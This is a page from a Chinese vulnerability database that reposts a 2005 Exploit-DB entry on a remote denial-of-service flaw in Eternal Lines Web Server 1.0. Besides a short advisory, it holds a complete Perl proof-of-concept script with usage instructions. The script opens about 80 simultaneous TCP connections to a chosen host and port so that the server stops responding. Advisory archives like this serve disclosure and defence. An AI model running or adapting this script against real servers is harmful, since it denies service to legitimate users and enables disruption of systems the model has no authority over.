Eternal Lines Web Server 1.0 – Remote Denial of Service

Eternal Lines Web Server 1.0 – Remote Denial of Service

漏洞ID 1054877 漏洞类型
发布时间 2005-02-01 更新时间 2005-02-01
图片[1]-Eternal Lines Web Server 1.0 – Remote Denial of Service-安全小百科CVE编号 N/A
图片[2]-Eternal Lines Web Server 1.0 – Remote Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25075
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12416/info

Eternal Lines Web Server is reported prone to a remote denial of service vulnerability. It is reported that the issue presents itself when the web service handles 70 or more simultaneous connections from a remote host.

A remote attacker may exploit this vulnerability to deny service to legitimate users. 

#!/usr/bin/perl
##############################################################
#        GSS-IT Research And Security Labs                   #
##############################################################
#                                                            #
#                www.gssit.co.il                             #
#                                                            #
##############################################################
#  Eternal Lines Web Server Ver 1.0 Denial Of Service POC    #
##############################################################
 
 
  
  use Socket;
  
  $host = $ARGV[0];
  $port = $ARGV[1];
  $slp  = $ARGV[2];
  $proto = getprotobyname('tcp');
  
 
if (($#ARGV) < 2)
{
print("##########################################################n");
print("# Eternal Lines Web Server Ver 1.0 Denial Of Service POC #n");
print("##########################################################nn");
print("Use : nnperl $0 [Host] [Port] [Sleep] n");
exit
}
 
print("##########################################################n");
print("# Eternal Lines Web Server Ver 1.0 Denial Of Service POC #n");
print("##########################################################n");
 
 
 
for ($i=1; $i<80; $i++)
{
  socket($i, PF_INET, SOCK_STREAM, $proto ); 
  $dest = sockaddr_in ($port, inet_aton($host));
  if (!(connect($i, $dest)))
  {
   Slp();
  } 
 
}
 
print("==> Unsuccesful <==");
exit;
 
 
sub Slp
 
{
 
 print("nnServer $host Has Been Successfully DoS'ednn");
 print("The Server Will Be Down For $slp Secondsnn");
 sleep ($slp);
 
 print("==> Killing Connections ...<==n");
 for ($j=1; $j<80; $j++)
  {
   shutdown($j,2);
  }
 print ("[#] Back To Work Server Up [#] ");
 exit;
}

相关推荐: WEBactive HTTP Server Default Log Vulnerability

WEBactive HTTP Server Default Log Vulnerability 漏洞ID 1103980 漏洞类型 Configuration Error 发布时间 2000-07-12 更新时间 2000-07-12 CVE编号 N/A CN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享